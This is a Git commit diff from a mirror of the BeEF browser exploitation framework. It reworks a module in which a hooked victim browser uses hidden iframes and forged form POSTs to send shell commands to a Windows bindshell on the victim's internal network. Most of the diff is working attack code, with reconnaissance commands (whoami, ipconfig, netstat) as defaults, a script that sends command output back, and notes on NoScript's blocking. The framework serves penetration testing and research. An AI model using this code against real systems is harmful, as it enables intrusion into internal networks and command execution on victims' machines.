Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Remove bi-directional communication from IPEC win bindshell module

Browse Source
This commit is contained in:
bcoles
2013-05-26 02:41:04 +09:30
parent f90ad4a261
commit 7aaafc79aa
4 changed files with 127 additions and 113 deletions
Download Patch File Download Diff File Expand all files Collapse all files

91
modules/ipec/inter_protocol_win_bindshell/command.js
View File

@@ -6,74 +6,41 @@
beef.execute(function() {
var target_ip = "<%= @ip %>";
var target_port = "<%= @port %>";
var cmd = "<%= @cmd %>";
var timeout = "<%= @command_timeout %>";
var internal_counter = 0;
cmd += " & echo __END_OF_WIN_IPC<%= @command_id %>__ & echo </pre>\"\" & echo <div id='ipc_content'>\"\"";
var iframe = document.createElement("iframe");
iframe.setAttribute("id","ipc_win_window_<%= @command_id %>");
iframe.setAttribute("style", "visibility:hidden;width:1px;height:1px;");
document.body.appendChild(iframe);
function do_submit(ip, port, content) {
var action = "http://" + ip + ":" + port + "/index.html?&cmd&";
var parent = window.location.href;
myform=document.createElement("form");
myform.setAttribute("name","data");
myform.setAttribute("method","post");
myform.setAttribute("enctype","multipart/form-data");
myform.setAttribute("action",action);
document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.document.body.appendChild(myform);
myExt = document.createElement("INPUT");
myExt.setAttribute("id",<%= @command_id %>);
myExt.setAttribute("name",<%= @command_id %>);
myExt.setAttribute("value",content);
myform.appendChild(myExt);
myExt = document.createElement("INPUT");
myExt.setAttribute("id","endTag");
myExt.setAttribute("name","</div>");
myExt.setAttribute("value","echo <scr"+"ipt>window.location='"+parent+"#ipc_result='+encodeURI(document.getElementById(\"ipc_content\").innerHTML);</"+"script>\"\" & exit");
myform.appendChild(myExt);
myform.submit();
// validate payload
try {
var cmd = '<%= @commands.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
} catch(e) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
return;
}
function waituntilok() {
try {
if (/#ipc_result=/.test(document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location)) {
ipc_result = document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location.href;
output = ipc_result.substring(ipc_result.indexOf('#ipc_result=')+12,ipc_result.lastIndexOf('__END_OF_WIN_IPC<%= @command_id %>__'));
beef.net.send('<%= @command_url %>', <%= @command_id %>, "result="+decodeURI(output.replace(/%0A/gi, "<br>")).replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/&lt;br&gt;/gi, "<br>"));
document.body.removeChild(iframe);
return;
} else throw("command results haven't been returned yet");
} catch (e) {
internal_counter++;
if (internal_counter > timeout) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Timeout after '+timeout+' seconds');
document.body.removeChild(iframe);
return;
}
setTimeout(function() {waituntilok()},1000);
}
// validate target host
var rhost = "<%= @rhost %>";
if (!rhost) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target host');
return;
}
if (!target_port || !target_ip || isNaN(target_port)) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed target host or target port');
} else if (target_port > 65535 || target_port < 0) {
// validate target port
var rport = "<%= @rport %>";
if (!rport || rport > 65535 || rport < 0 || isNaN(rport)) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port');
} else {
do_submit(target_ip, target_port, cmd);
waituntilok();
return;
}
// validate timeout
var timeout = "<%= @timeout %>";
if (isNaN(timeout)) timeout = 30;
// send commands
var win_ipec_form_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html?&cmd&", cmd + " & exit");
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Shell commands sent');
// clean up
cleanup = function() {
document.body.removeChild(win_ipec_form_<%= @command_id %>);
}
setTimeout("cleanup()", timeout * 1000);
});

86
modules/ipec/inter_protocol_win_bindshell/command.old.js Normal file
View File

@@ -0,0 +1,86 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// This is the old module which supports bi-directional communications for Firefox before version ~16
beef.execute(function() {
var target_ip = "<%= @ip %>";
var target_port = "<%= @port %>";
var cmd = "<%= @cmd %>";
var timeout = "<%= @command_timeout %>";
var internal_counter = 0;
cmd += " & echo __END_OF_WIN_IPC<%= @command_id %>__ & echo </pre>\"\" & echo <div id='ipc_content'>\"\"";
var iframe = document.createElement("iframe");
iframe.setAttribute("id","ipc_win_window_<%= @command_id %>");
iframe.setAttribute("style", "visibility:hidden;width:1px;height:1px;");
document.body.appendChild(iframe);
function do_submit(ip, port, content) {
var action = "http://" + ip + ":" + port + "/index.html?&cmd&";
var parent = window.location.href;
myform=document.createElement("form");
myform.setAttribute("name","data");
myform.setAttribute("method","post");
myform.setAttribute("enctype","multipart/form-data");
myform.setAttribute("action",action);
document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.document.body.appendChild(myform);
myExt = document.createElement("INPUT");
myExt.setAttribute("id",<%= @command_id %>);
myExt.setAttribute("name",<%= @command_id %>);
myExt.setAttribute("value",content);
myform.appendChild(myExt);
myExt = document.createElement("INPUT");
myExt.setAttribute("id","endTag");
myExt.setAttribute("name","</div>");
myExt.setAttribute("value","echo <scr"+"ipt>window.location='"+parent+"#ipc_result='+encodeURI(document.getElementById(\"ipc_content\").innerHTML);</"+"script>\"\" & exit");
myform.appendChild(myExt);
myform.submit();
}
function waituntilok() {
try {
if (/#ipc_result=/.test(document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location)) {
ipc_result = document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location.href;
output = ipc_result.substring(ipc_result.indexOf('#ipc_result=')+12,ipc_result.lastIndexOf('__END_OF_WIN_IPC<%= @command_id %>__'));
beef.net.send('<%= @command_url %>', <%= @command_id %>, "result="+decodeURI(output.replace(/%0A/gi, "<br>")).replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/&lt;br&gt;/gi, "<br>"));
document.body.removeChild(iframe);
return;
} else throw("command results haven't been returned yet");
} catch (e) {
internal_counter++;
if (internal_counter > timeout) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Timeout after '+timeout+' seconds');
document.body.removeChild(iframe);
return;
}
setTimeout(function() {waituntilok()},1000);
}
}
// validate target host
if (!target_ip) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target host');
return;
}
// validate target port
if (!target_port || target_port > 65535 || target_port < 0 || isNaN(target_port)) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port');
return;
}
// send commands
do_submit(target_ip, target_port, cmd);
waituntilok();
});

6
modules/ipec/inter_protocol_win_bindshell/config.yaml
View File

@@ -9,8 +9,8 @@ beef:
enable: true
category: "IPEC"
name: "Bindshell (Windows)"
description: "Using Inter-protocol Exploitation/Communication (IPEC) the hooked browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input field. <br><br>The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet."
description: "Using Inter-Protocol Exploitation/Communication (IPEC) the hooked browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input field.<br/><br/>The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF.<br/><br/>Note: ampersands are required to seperate commands."
authors: ["bcoles", "wade"]
target:
working: ["FF"]
not_working: ["C", "S", "O", "IE"]
working: ["FF", "C"]
not_working: ["S", "O", "IE"]

57
modules/ipec/inter_protocol_win_bindshell/module.rb
View File

@@ -4,67 +4,28 @@
# See the file 'doc/COPYING' for copying permission
#
=begin
[+] Summary:
Using Inter-protocol Communication (IPC) the zombie browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input. The target address can be on the zombie's subnet which is potentially not directly accessible from the Internet.
The command results are returned to the BeEF control panel.
[+] Tested:
o Working:
o Mozilla Firefox 4
o Mozilla Firefox 5
o Not Working:
o Mozilla Firefox 5 with the NoScript extension
o Internet Explorer 8+
o Chrome 13
o Opera 11
o Safari 5
[+] Notes:
o The bindshell is closed once the module has completed. This is necessary otherwise the cmd.exe process will hang. To avoid this issue:
o use the netcat persistent listen "-L" option rather than the listen "-l" option; or
o remove the "& exit" portion of the JavaScript payload. Be aware that this will leave redundant cmd.exe processes running on the target system.
o The NoScript extension for Firefox aborts the request when attempting to access a host on the internal network and displays the following warning:
[ABE] <LOCAL> Deny on {POST http://localhost:4444/index.html?&cmd& <<< about:blank - 7}
SYSTEM rule:
Site LOCAL
Accept from LOCAL
Deny
o Internet Explorer is not supported as IE 8+ does not allow posting data to internal network addresses. Earlier versions of IE have not been tested.
o Returning the shell command results is not supported in Chrome, Safari and Opera as JavaScript cannot be executed within the bindshell iframe. The shell commands are executed on the target shell however.
o This module is incompatible with autorun. Upon completing the shell commands it will load the original hooked window in a child iframe resulting in an additional hook. This will result in an infinite loop if this module is set to autorun.
The bindshell is closed once the module has completed. This is necessary otherwise the cmd.exe process will hang. To avoid this issue:
- use the netcat persistent listen "-L" option rather than the listen "-l" option; or
- remove the "& exit" portion of the JavaScript payload. Be aware that this will leave redundant cmd.exe processes running on the target system.
Returning the shell command results is not supported in Firefox ~16+, IE, Chrome, Safari and Opera as JavaScript cannot be executed within the bindshell iframe due to content-type restrictions. The shell commands are executed on the target shell however.
=end
class Inter_protocol_win_bindshell < BeEF::Core::Command
def self.options
return [
{'name'=>'ip', 'ui_label' => 'Target Address', 'value' => 'localhost'},
{'name'=>'port', 'ui_label' => 'Target Port', 'value' => '4444'},
{'name'=>'command_timeout', 'ui_label'=>'Timeout (s)', 'value'=>'30'},
{'name'=>'cmd', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: the ampersands are required to seperate commands', 'type'=>'textarea', 'value'=>'echo User: & whoami & echo Directory Contents: & dir & echo HostName: & hostname & ipconfig & netstat -an', 'width'=>'200px' }
{'name'=>'rhost', 'ui_label'=>'Target Address', 'value'=>'127.0.0.1'},
{'name'=>'rport', 'ui_label'=>'Target Port', 'value'=>'4444'},
{'name'=>'timeout', 'ui_label'=>'Timeout (s)', 'value'=>'30'},
{'name'=>'commands','ui_label'=>'Shell Commands', 'description'=>'Enter shell commands to execute. Note: ampersands are required to seperate commands', 'type'=>'textarea', 'value'=>'echo User: & whoami & echo Directory Path: & pwd & echo Directory Contents: & dir & echo HostName: & hostname & ipconfig & netstat -an', 'width'=>'200px' }
]
end
def post_execute
content = {}
content['result'] = @datastore['result'] if not @datastore['result'].nil?
content['fail'] = @datastore['fail'] if not @datastore['fail'].nil?
if content.empty?
content['fail'] = 'No data was returned.'
end
content['fail'] = @datastore['fail'] if not @datastore['fail'].nil?
save content
end
end